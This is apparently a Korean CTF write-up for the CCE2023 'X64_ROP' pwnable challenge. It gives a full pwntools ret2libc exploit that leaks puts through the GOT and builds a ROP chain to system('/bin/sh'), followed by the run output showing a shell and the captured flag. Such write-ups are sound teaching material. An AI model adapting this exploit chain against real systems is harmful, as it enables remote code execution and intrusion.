반응형
Description
X64_ ROP
nc prob2.cstec.kr 5339
64비트 ROP 문제. 버퍼 오버플로 취약점이 존재하며, PIE 가 꺼져 있다.
익스플로잇 작성
#!/usr/bin/python3
from pwn import *
p = remote("prob2.cstec.kr", 5339)
e = ELF("./x64_rop")
l = ELF("./libc.so.6")
p.sendlineafter(b"Enter choice : ", b"1")
ret = 0x000000000040101a
rdi = 0x0000000000401203
buf = b""
buf += b'A' * 16
buf += b'B' * 8
buf += p64(rdi)
buf += p64(e.got["puts"])
buf += p64(e.plt["puts"])
buf += p64(e.sym["main"])
p.send(buf)
leak = p.recv(6) + b"\x00\x00"
leak = u64(leak)
leak -= l.sym["puts"]
print(hex(leak))
system = leak + l.sym["system"]
binsh = leak + list(l.search(b"/bin/sh"))[0]
p.sendlineafter(b"Enter choice : ", b"1")
buf = b""
buf += b'A' * 16
buf += b'B' * 8
buf += p64(ret)
buf += p64(rdi)
buf += p64(binsh)
buf += p64(system)
p.send(buf)
p.interactive()root@learner:/home/learner/Downloads/for_user# ./exploit64.py
[+] Opening connection to prob2.cstec.kr on port 5339: Done
[*] '/home/learner/Downloads/for_user/x64_rop'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] '/home/learner/Downloads/for_user/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
0x7f488359f000
[*] Switching to interactive mode
$ ls
bin
boot
dev
etc
flag
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat flag
apollob{c425dd1f1a818f4285f1a7179e42f1be277e1482abd80bcd8b9cd9d7e192d2fc2886f71185205befa3a3a5577938087fe7d91f507e5d3817c1fb4c673e1fcfac1e}반응형
'IT > CTF' 카테고리의 다른 글
| CCE2023 APOLLO WEB HACKING [100] - GS25 (0) | 2023.06.06 |
|---|---|
| CCE2023 APOLLO WEB HACKING [100] - Request forgery (0) | 2023.06.06 |
| CCE2023 APOLLO PWNABLE [100] - X86_ROP (0) | 2023.06.06 |
| CCE2023 APOLLO CRYPTO [100] - Base64? (0) | 2023.06.06 |
| CCE2023 APOLLO CRYPTO [100] - ROT (0) | 2023.06.04 |
